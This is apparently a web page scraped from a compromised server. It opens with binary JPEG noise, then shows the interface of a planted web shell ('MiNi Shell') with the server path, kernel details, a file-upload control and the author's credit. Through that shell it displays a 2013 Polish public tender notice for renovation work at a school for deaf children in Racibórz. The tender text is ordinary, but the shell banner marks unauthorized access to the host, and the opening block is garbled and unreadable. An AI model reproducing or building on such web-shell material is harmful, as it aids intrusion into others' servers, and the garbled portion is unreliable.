JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130514/188650-N-2013.html

<p class="kh_header"><b>Racibórz: Roboty remontowe w SOSWNiS, w tym:
Część I - zadanie 1 -  remont dachu-etap II i remont pomieszczeń po zalaniu w budynku Sali Gimnastycznej;
Część II - zadanie 2 - prace malarskie w budynku Szkoły Podstawowej;
Część III - zadanie 3 - prace remontowe w budynku Internatu</b><br>
<b>Numer ogłoszenia: 188650 - 2013; data zamieszczenia: 14.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalny Ośrodek Szkolno-Wychowawczy dla Niesłyszących i Słabosłyszących , ul. Karola Miarki 4, 47-400 Racibórz, woj. śląskie, tel. 032 4147334, 4152255, 4153001, faks 032 4147334, 4152255 w. 42.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.oswnis.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty remontowe w SOSWNiS, w tym:
Część I - zadanie 1 -  remont dachu-etap II i remont pomieszczeń po zalaniu w budynku Sali Gimnastycznej;
Część II - zadanie 2 - prace malarskie w budynku Szkoły Podstawowej;
Część III - zadanie 3 - prace remontowe w budynku Internatu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> wykonanie robót remontowych w SOSWNiS, w tym: 
Część I - zadanie 1 - remont dachu etap II i remont pomieszczeń po zalaniu w budynku Sali Gimnastycznej, w tym: 
- docieplenie stropodachów przybudówek;
- wykonanie pokrycia z papy termozgrzewalnej;
- montaż rynien i rur spustowych;
- obróbki blacharskie;
- wymiana fragmentu murłaty;
- naprawa ubytków więźby dachowej;
- wykonanie impregnacji więźby dachowej przed ogniem, grzybami, szkodnikami;
- roboty w zakresie ochrony powierzchni;
- demontaż i ponowny montaż drabinek gimnastycznych;
- uzupełnienie tynków wewnętrznych;
- prace malarskie;
- wymiana wentylatorów.
Część II - zadanie 2 - prace malarskie w budynku Szkoły Podstawowej, w tym: 
- uzupełnienie tynków wewnętrznych, częściowe pokrycie ścian warstwą siatki z włókna szklanego, położenie gładzi gipsowej, malowanie ścian i sufitów.
Część III - zadanie 3 - prace remontowe w budynku Internatu (budynku mieszkalnym grup wychowawczych) w tym:
- naprawa i cyklinowanie parkietu, wymiana wykładziny na scenie, malowanie w pomieszczeniu auli;
- naprawa posadzki lastrykowej, likwidacja progów i uzupełnienie płytek w przejściach z korytarza do świetlicy;
- demontaż złomowy podwieszenia sufitów, uzupełnienie tynków wymiana kratek wentylacyjnych, wymiana podokienników, wymiana fragmentu płytek okładzinowych, osadzenie wsporników do rur, malowanie w łazienkach (Ip. cz. męska strona lewa);
- wymiana drzwi, wymiana baterii umywalkowych w łazienkach (cz. męska);
- wymiana fragmentów płytek posadzkowych, uzupełnienie ścianek z cegieł, licowanie fragmentów ścian, osadzenie wsporników do rur, montaż zasłony prysznicowej w łazienkach (IIIp. cz. męska strona prawa)
- naprawa tynków, malowanie świetlicy (IIIp. cz. żeńska)
Szczegółowy opis przedmiotu zamówienia został określony w Dziale III SIWZ- który zawiera przedmiary robót i Specyfikacje techniczne wykonania i odbioru robót budowlanych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.19.00-3, 45.26.14.10-1, 45.26.13.20-3, 45.44.21.00-8, 45.44.23.00-0, 45.43.21.14-6, 45.33.22.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W odniesieniu do wszystkich części - zadań:
Zamawiający nie określa  szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia  tego warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W odniesieniu do części I - zadanie 1:
Wykonawca musi wykazać, że wykonał, w okresie ostatnich pięciu lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co  najmniej jedną robotę budowlaną związaną z remontem dachu w budynkach użyteczności publicznej o wartości nie mniejszej niż 50 000,-zł brutto.
W odniesieniu do części II i III - zadanie 2 i 3:
Zamawiający nie określa  szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia  tego warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W odniesieniu do wszystkich części - zadań:
Zamawiający nie określa  szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia  tego warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W odniesieniu do wszystkich części - zadań:
Zamawiający nie określa  szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia  tego warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W odniesieniu do wszystkich części - zadań:
Zamawiający nie określa szczegółowego warunku udziału w postępowaniu. Zamawiający dokona oceny spełnienia  tego warunku na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana terminu realizacji umowy.
1)	W przypadku konieczności podjęcia działań zmierzających do ograniczenia skutków zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, szczególnie zagrażające bezpośrednio życiu lub zdrowiu ludzi lub grożące powstaniem szkody znacznych rozmiarach;
2)	W razie wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych,  nie pozwalających na dochowanie parametrów technologicznych i jakościowych realizowanych robót;
3)	W razie zmian będących następstwem okoliczności leżących po stronie Zamawiającego, w szczególności: konieczność usunięcia istotnych błędów lub wprowadzenia istotnych zmian w dokumentacji technicznej - nie ujawnionych przed wszczęciem postępowania o udzielenie zamówienia publicznego;
4)	Z powodu działań osób trzecich uniemożliwiających wykonanie prac określonym terminie, które to działania nie są konsekwencją winy którejkolwiek ze stron; 
5)	Zmiany będące następstwem wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy;
6)	W przypadku zmian wynikających z konieczności wykonania robót niezwiązanych bezpośrednio  z przedmiotem umowy, których brak wykonania uniemożliwia lub utrudnia prawidłowe wykonanie przedmiotu umowy.
2.	Zmiana sposobu spełnienia świadczenia, jego zakresu, zmiana wynagrodzenia. 
1)	Zmiany spowodowane koniecznością zrealizowania zadania przy zastosowaniu innych rozwiązań technicznych/ technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
2)	Zmiany technologiczne prowadzące do obniżenia kosztu wykonania robót bez uszczerbku dla jakości i funkcjonalności.
3)	Zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, w razie istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia.
3.	Zmiana osób i podmiotów.
1)	Zmiany osób i podmiotów zdolnych do wykonania zamówienia, w przypadku zdarzeń losowych niezależnych od Wykonawcy, na uzasadniony wniosek Wykonawcy;
2)	Zmiany podwykonawcy lub rezygnacje z udziału podwykonawcy przy realizacji przedmiotu zamówienia.  Zmiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji robót. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę.
4.	Inne zmiany.
1)	Zmiany wskutek wystąpienia okoliczności, których Zamawiający nie był w stanie przewidzieć, pomimo zachowania należytej staranności;
2)	Zmiany dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, numerów kont bankowych oraz innych danych identyfikacyjnych;
3)	Zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy;
4)	 Dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania o udzielenie zamówienia publicznego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.oswnis.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Karola Miarki 4, 47-400 Racibórz, parter - pok. nr 1.18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2013 godzina 10:00, miejsce: Siedziba zamawiającego:  47-400 Racibórz, ul. Karola Miarki 4 - w budynku Szkoły Podstawowej (budynek administracyjny) - parter pokój nr 1.1 - biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - remont dachu etap II i remont pomieszczeń po zalaniu w budynku Sali Gimnastycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - docieplenie stropodachów przybudówek;
- wykonanie pokrycia z papy termozgrzewalnej;
- montaż rynien i rur spustowych;
- obróbki blacharskie;
- wymiana fragmentu murłaty;
- naprawa ubytków więźby dachowej;
- wykonanie impregnacji więźby dachowej przed ogniem, grzybami, szkodnikami;
- roboty w zakresie ochrony powierzchni;
- demontaż i ponowny montaż drabinek gimnastycznych;
- uzupełnienie tynków wewnętrznych;
- prace malarskie;
- wymiana wentylatorów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.26.19.00-3, 45.26.14.10-1, 45.26.13.20-3, 45.44.21.00-8, 45.44.23.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - prace malarskie w budynku Szkoły Podstawowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uzupełnienie tynków wewnętrznych, częściowe pokrycie ścian warstwą siatki z włókna szklanego, położenie gładzi gipsowej, malowanie ścian i sufitów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - prace remontowe w budynku Internatu (budynku mieszkalnym grup wychowawczych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - naprawa i cyklinowanie parkietu, wymiana wykładziny na scenie, malowanie w pomieszczeniu auli;
- naprawa posadzki lastrykowej, likwidacja progów i uzupełnienie płytek w przejściach z korytarza do świetlicy;
- demontaż złomowy podwieszenia sufitów, uzupełnienie tynków wymiana kratek wentylacyjnych, wymiana podokienników, wymiana fragmentu płytek okładzinowych, osadzenie wsporników do rur, malowanie w łazienkach (Ip. cz. męska strona lewa);
- wymiana drzwi, wymiana baterii umywalkowych w łazienkach (cz. męska);
- wymiana fragmentów płytek posadzkowych, uzupełnienie ścianek z cegieł, licowanie fragmentów ścian, osadzenie wsporników do rur, montaż zasłony prysznicowej w łazienkach (IIIp. cz. męska strona prawa)
- naprawa tynków, malowanie świetlicy (IIIp. cz. żeńska).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.14-6, 45.44.23.00-0, 45.33.22.00-5, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com